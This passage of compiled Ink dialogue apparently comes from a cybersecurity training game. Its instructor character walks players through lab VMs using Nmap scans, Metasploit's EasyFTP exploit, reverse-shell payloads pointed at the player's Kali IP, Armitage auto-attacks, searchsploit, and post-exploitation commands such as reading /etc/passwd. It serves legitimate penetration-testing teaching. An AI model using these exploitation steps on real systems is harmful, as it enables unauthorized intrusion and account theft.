back","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-2":["\n",[["ev",{"^->":"commands_reference.0.c-2.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Searching for Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-2.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > help search","\n","^msf > search easyftp","\n","^msf > search type:exploit platform:Windows","\n","^msf > search type:exploit cve:2003-0352","\n","^msf > search buffer overflow","\n","^msf > search type:exploit platform:linux","\n","^msf > info 
exploit/windows/ftp/easyftp_cwd_fixret","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-3":["\n",[["ev",{"^->":"commands_reference.0.c-3.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Launching Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-3.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use exploit/windows/ftp/easyftp_cwd_fixret","\n","^msf exploit(...) > show options","\n","^msf exploit(...) > set RHOST TARGET_IP","\n","^msf exploit(...) > show payloads","\n","^msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp","\n","^msf exploit(...) > set LHOST YOUR_KALI_IP","\n","^msf exploit(...) > check (if supported)","\n","^msf exploit(...) > exploit","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-4":["\n",[["ev",{"^->":"commands_reference.0.c-4.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Post-Exploitation Commands (Windows):**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-4.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Post-Exploitation Commands (Linux):**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-4.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check privileges)","\n","^type C:pathtoflag.txt (read file)","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-4.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^ls -la (list files)","\n","^cat /etc/passwd (view user 
accounts)","\n","^whoami (current user)","\n","^cat flag (read flag file)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-5":["\n",[["ev",{"^->":"commands_reference.0.c-5.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Armitage Setup:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-5.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Armitage Workflow:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-5.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^armitage &","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-5.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^1. Hosts → Nmap Scan → Quick Scan (OS detect)","\n","^2. Armitage → Set Exploit Rank → Poor","\n","^3. Attacks → Find attacks","\n","^4. Right-click host → Attack → select exploit → Launch","\n","^5. 
Right-click compromised host → Interact → Command shell","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-6":["\n",[["ev",{"^->":"commands_reference.0.c-6.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Exploit Database:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-6.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^less /usr/share/exploitdb/files_exploits.csv","\n","^grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^searchsploit easyftp","\n","^searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"g-0":[{"->":"exploitation_hub"},null]}],null],"challenge_tips":[["^Let me give you practical tips for succeeding in the exploitation challenges.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"challenge_tips.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Finding Vulnerable Services:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"challenge_tips.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET","\n","^Pay close attention to service versions - specific version numbers are key to finding exploits.","\n","^Import results into Metasploit for easier targeting: db_nmap -sV TARGET","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Tips for exploiting the Windows server?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Tips for exploiting the Linux 
server?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Tips for using Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^General troubleshooting advice?","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Where are the flags?","/str","/ev",{"*":".^.c-4","flg":4},{"c-0":["\n","^The Windows server is running EasyFTP with a known vulnerability.","\n","^Search for it: search easyftp","\n","^Look for the module ending in \"cwd_fixret\"","\n","^Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp","\n","^Make sure to set LHOST to YOUR Kali IP (the host-only network address).","\n","^If the exploit fails, restart the Windows VM and try again.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The Linux server has multiple potentially vulnerable services.","\n","^Scan all ports to find everything running: nmap -sV -p- TARGET","\n","^Look for services like vsftpd, IRC, or other network services.","\n","^Search Metasploit for exploits matching those services.","\n","^Remember to use a Unix reverse shell payload: cmd/unix/reverse","\n","^Some Linux exploits are more reliable than others - you may need to try a few.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage is great for beginners because it suggests attacks automatically.","\n","^Make sure you set the exploit rank to \"Poor\" or you'll miss some exploits.","\n","^Don't just click the first suggested attack - read the module info to understand what it does.","\n","^Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1.","\n","^If Armitage seems to hang, check the console tab at the bottom for error 
messages.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Always verify your IP addresses with \"show options\" before running exploits.","\n","^RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP.","\n","^If services stop responding, restart the target VM - exploits often crash vulnerable services.","\n","^After successfully exploiting a service once, you'll need to restart the VM to exploit it again.","\n","^Be patient - some exploits take time to establish connections.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-4":["\n","^For the Windows server, look on a user's Desktop.","\n","^Navigate with: cd C:Users or cd C:Documents and Settings","\n","^List directories with: dir","\n","^Read flag files with: type flag.txt","\n","^For the Linux server, flags are typically in user home directories.","\n","^Navigate with: cd /home","\n","^List directories with: ls -la","\n","^Read flags with: cat flag","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"ready_for_practice":[["^Excellent! You're ready to start practical exploitation.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^You now understand how to move from scanning to exploitation - the core of penetration testing.","\n","^Remember: these techniques are powerful. 
Use them only for authorized security testing and defensive purposes.","\n","^In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access.","\n","ev","str","^Any final advice before I start?","/str","/ev",{"*":".^.c-0","flg":4},{"c-0":["\n","^Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit.","\n","^Don't rush. Take time to understand what each exploit does and why it works.","\n","^If something doesn't work, check your settings, restart the target, and try again.","\n","^Try both msfconsole and Armitage to see which you prefer.","\n","^Most importantly: always verify you're targeting the right system and have authorization!","\n","^Good luck, Agent ","ev",{"VAR?":"player_name"},"out","/ev","^. Time to put your skills to the test.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},{"->":"exploitation_hub"},null]}],null],"global decl":["ev",0,{"VAR=":"instructor_rapport"},0,{"VAR=":"exploitation_mastery"},"str","^Agent 0x00","/str",{"VAR=":"player_name"},"/ev","end",null]}],"listDefs":{}} \ No newline at end of file +{"inkVersion":21,"root":[[["done",{"#n":"g-0"}],null],"done",{"start":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome back, ","ev",{"VAR?":"player_name"},"out","/ev","^. What would you like to discuss?","\n",{"->":"exploitation_hub"},null],"intro_timed":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome to From Scanning to Exploitation, ","ev",{"VAR?":"player_name"},"out","/ev","^. I'm your exploitation specialist instructor for this session.","\n","^This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. 
You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.","\n","^We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process.","\n","^Remember: this knowledge is for authorized penetration testing and defensive security only.","\n","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^Let me explain how this lab works. You'll find three key resources here:","\n","^First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.","\n","^Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows server, and a Linux server for hands-on exploitation practice.","\n","^Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.","\n","^You can talk to me anytime to explore exploitation concepts, get tips, or ask questions about the material. I'm here to help guide your learning.","\n","^Ready to get started? 
Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.","\n",{"->":"exploitation_hub"},null],"exploitation_hub":[["^What aspect of exploitation would you like to explore?","\n","ev","str","^Why combine scanning and exploitation?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Scanning targets with Nmap","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Metasploit database and scan import","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Running scans from within msfconsole","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Searching for Metasploit exploits","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Launching Metasploit exploits","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Introduction to Armitage","/str","/ev",{"*":".^.c-6","flg":4},"ev","str","^Using Armitage for automated hacking","/str","/ev",{"*":".^.c-7","flg":4},"ev","str","^Vulnerability databases and research","/str","/ev",{"*":".^.c-8","flg":4},"ev","str","^The Exploit Database and searchsploit","/str","/ev",{"*":".^.c-9","flg":4},"ev","str","^Show me the commands reference","/str","/ev",{"*":".^.c-10","flg":4},"ev","str","^Practical challenge tips","/str","/ev",{"*":".^.c-11","flg":4},"ev","str","^I'm ready for the lab exercises","/str","/ev",{"*":".^.c-12","flg":4},"ev","str","^That's all for 
now","/str","/ev",{"*":".^.c-13","flg":4},{"c-0":["\n",{"->":"scanning_to_exploitation"},null],"c-1":["\n",{"->":"nmap_scanning"},null],"c-2":["\n",{"->":"metasploit_database"},null],"c-3":["\n",{"->":"msfconsole_scanning"},null],"c-4":["\n",{"->":"searching_exploits"},null],"c-5":["\n",{"->":"launching_exploits"},null],"c-6":["\n",{"->":"armitage_intro"},null],"c-7":["\n",{"->":"armitage_usage"},null],"c-8":["\n",{"->":"vulnerability_databases"},null],"c-9":["\n",{"->":"exploit_db"},null],"c-10":["\n",{"->":"commands_reference"},null],"c-11":["\n",{"->":"challenge_tips"},null],"c-12":["\n",{"->":"ready_for_practice"},null],"c-13":["\n","#","^exit_conversation","/#",{"->":".^.^.^"},null]}],null],"scanning_to_exploitation":[["^After gathering information about a target through footprinting and scanning, you need to know what attacks will work.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security?","\n","^Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information.","\n","ev","str","^What makes a target exploitable?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I know what attacks will work?","/str","/ev",{"*":".^.c-1","flg":4},{"c-0":["\n","^A target is exploitable when it's running vulnerable software that you have an exploit for.","\n","^For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system.","\n","^The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. 
The exploitation phase is when you actually attack.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^This is where vulnerability databases and exploit frameworks like Metasploit come in.","\n","^After scanning reveals \"Windows 2000 with EasyFTP 1.7.0.11,\" you can search for known vulnerabilities in those specific versions.","\n","^Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number.","\n","^We'll also look at external databases like CVE Details, NVD, and Exploit DB.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"nmap_scanning":[["^The first step is thorough scanning to identify your targets and what they're running.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows.","\n","^A comprehensive scan would be: nmap -sV 10.X.X.2-3","\n","^Where X.X are the second and third octets of your Kali VM's IP address.","\n","ev","str","^What should I look for in the scan results?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What if the scan takes too long?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if nmap shows ftp with a question mark?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Pay attention to several key pieces of information:","\n","^First, the IP addresses - which host is Linux and which is Windows?","\n","^Second, what services are running - HTTP, FTP, SSH, IRC?","\n","^Third, and most importantly, what specific software versions are running. 
For example: \"vsftpd 2.3.4\" or \"EasyFTP 1.7.0.11\"","\n","^Those specific version numbers are critical for finding applicable exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Windows scans can take several minutes to complete - this is normal.","\n","^If you want faster results, you can skip OS detection or scan fewer ports.","\n","^However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^If you see \"ftp?\" in the results, it means Nmap isn't confident about the service identification.","\n","^This can happen if the service is slow to respond or behaving unusually.","\n","^Try restarting the Windows server and scanning again. The service should respond properly after a fresh start.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"metasploit_database":[["^Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services.","\n","^Before using the database, you need to initialize it and start PostgreSQL.","\n","ev","str","^How do I initialize the Metasploit database?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I import Nmap scan results?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What can I do with the 
database?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^First, reinitialize the database: sudo msfdb reinit","\n","^Then start PostgreSQL: sudo service postgresql start","\n","^These commands set up the database that Metasploit will use to store scan results and track compromised hosts.","\n","^You only need to do this once per session, or after restarting your Kali VM.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^If you've saved Nmap results in XML format, you can import them:","\n","^From msfconsole, run: db_import scan_output.xml","\n","^Metasploit will parse the XML and populate the database with host and service information.","\n","^You can then query this data with commands like \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Once data is in the database, you can query it intelligently:","\n","^\"hosts\" shows all discovered hosts and their operating systems.","\n","^\"services\" shows all discovered services across all hosts.","\n","^\"services -p 21\" shows only services on port 21 (FTP).","\n","^\"services -p 21 -R\" does the same AND automatically sets RHOSTS to target those services!","\n","^This integration makes targeting much more efficient.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"msfconsole_scanning":[["^You can run scans directly from within msfconsole - you don't always need a separate terminal.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET","\n","^Even better, you 
can use db_nmap which scans AND automatically imports results into the database.","\n","ev","str","^What's the difference between nmap and db_nmap?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Does Metasploit have its own scanners?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I use Metasploit's port scanner?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^When you run \"nmap\" from msfconsole, it just executes Nmap normally. You'd need to manually import the results.","\n","^When you run \"db_nmap\", it does the same scan BUT automatically imports results into the Metasploit database.","\n","^For example: msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^This scans all ports with OS and version detection, and the results are immediately available via \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap.","\n","^You can see them with: use auxiliary/scanner/portscan/ (then press TAB)","\n","^For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp","\n","^These modules integrate directly with the database and can use multiple threads for faster scanning.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, select the module: use auxiliary/scanner/portscan/tcp","\n","^Set the target: set RHOSTS TARGET_IP","\n","^Optionally speed it up: set THREADS 10","\n","^Then run it: run","\n","^Results are automatically stored in the database. 
You can verify with the \"services\" command.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"searching_exploits":[["^Metasploit's search command is incredibly powerful for finding relevant exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^You can search by platform, service name, CVE number, exploit type, and more.","\n","^The basic syntax is: search ","\n","^But you can be much more specific with search operators.","\n","ev","str","^What search operators are available?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I search for specific software?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Give me some search examples","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the main search operators:","\n","^type: - Specify module type (exploit, auxiliary, post)","\n","^platform: - Specify platform (Windows, Linux, etc.)","\n","^cve: - Search by CVE number","\n","^name: - Search module names","\n","^For example: search type:exploit platform:Windows","\n","^Or: search type:exploit cve:2003-0352","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Simply include the software name in the search:","\n","^search easyftp","\n","^search vsftpd","\n","^search unreal","\n","^Metasploit will search module names, descriptions, and references for matches.","\n","^Look through the results for modules that match your target's version number.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Sure! 
Here are useful searches:","\n","^search type:exploit platform:linux","\n","^search type:exploit cve:2018","\n","^search buffer overflow","\n","^search type:exploit platform:Windows XP","\n","^search IRC (to find IRC server exploits)","\n","^Once you find a promising module, use \"info exploit/path/to/module\" to learn more about it.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"launching_exploits":[["^Once you've identified the right exploit module, launching it follows a standard workflow.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The process is: select the module, configure options, choose a payload, and launch the attack.","\n","^Let's walk through a typical exploitation scenario.","\n","ev","str","^Walk me through exploiting EasyFTP","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What payloads should I use?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if the exploit doesn't work?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^What can I do once I have a shell?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Let me guide you through the complete process:","\n","^First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret","\n","^Check required options: show options","\n","^Set the target: set RHOST TARGET_IP","\n","^Choose a payload: set PAYLOAD windows/shell/reverse_tcp","\n","^Set your IP for the reverse shell: set LHOST YOUR_KALI_IP","\n","^Optionally check if it's vulnerable: check (though most don't support this)","\n","^Launch the attack: exploit","\n","^If successful, you'll get a shell on the target!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The payload depends on what you 
want to achieve and what the exploit supports.","\n","^You can see compatible payloads with: show payloads","\n","^For Windows targets, common choices include:","\n","^windows/shell/reverse_tcp - Basic command shell","\n","^windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features","\n","^For Linux targets:","\n","^cmd/unix/reverse - Simple Unix shell","\n","^linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, run \"show options\" and verify all settings, especially IP addresses.","\n","^Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST.","\n","^Try restarting the target VM - sometimes services crash after failed exploit attempts.","\n","^Verify the target is actually running the vulnerable software at that version.","\n","^Some exploits are unreliable and may need multiple attempts.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^With a Windows shell, you can run commands like:","\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check your privileges)","\n","^For Linux shells:","\n","^ls -la (list files)","\n","^cat /etc/passwd (view user accounts)","\n","^whoami (check current user)","\n","^We'll cover post-exploitation in more depth in later labs.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_intro":[["^Armitage is a free and open source graphical interface for Metasploit with powerful automation 
features.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing.","\n","^Armitage can scan networks, automatically suggest attacks, and visualize compromised systems.","\n","ev","str","^How is Armitage different from msfconsole?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I start Armitage?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What does the Armitage interface show?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Msfconsole is a command-line interface that gives you complete control and flexibility.","\n","^Armitage provides a graphical interface that visualizes the network and automates finding attacks.","\n","^Armitage can look at scan results and automatically suggest which exploits might work against each target.","\n","^It's particularly useful for beginners or when you want to quickly test multiple targets.","\n","^However, experienced penetration testers often prefer msfconsole for its power and speed.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^First, initialize the Metasploit database if you haven't already:","\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^Then start Armitage: armitage &","\n","^The & runs it in the background so you can continue using your terminal.","\n","^Leave the connection options as default and click \"Connect\"","\n","^If prompted, allow Armitage to start the Metasploit RPC server.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage displays a visual network map showing discovered hosts.","\n","^Each host is represented by an icon - the icon shows the detected operating 
system.","\n","^Compromised systems are shown in red with lightning bolts.","\n","^You can right-click hosts to see suggested attacks, launch exploits, or interact with shells.","\n","^The interface makes it easy to see the big picture of a network and what you've compromised.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_usage":[["^Let me walk you through using Armitage to scan and exploit targets.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow.","\n","ev","str","^How do I scan with Armitage?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How does Armitage suggest attacks?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I launch an attack in Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I interact with a compromised system?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Click the \"Hosts\" menu, select \"Nmap Scan\", then choose a scan type.","\n","^\"Quick Scan (OS detect)\" is a good starting point: nmap -O -sV TARGET","\n","^Enter the IP address to scan and Armitage will run 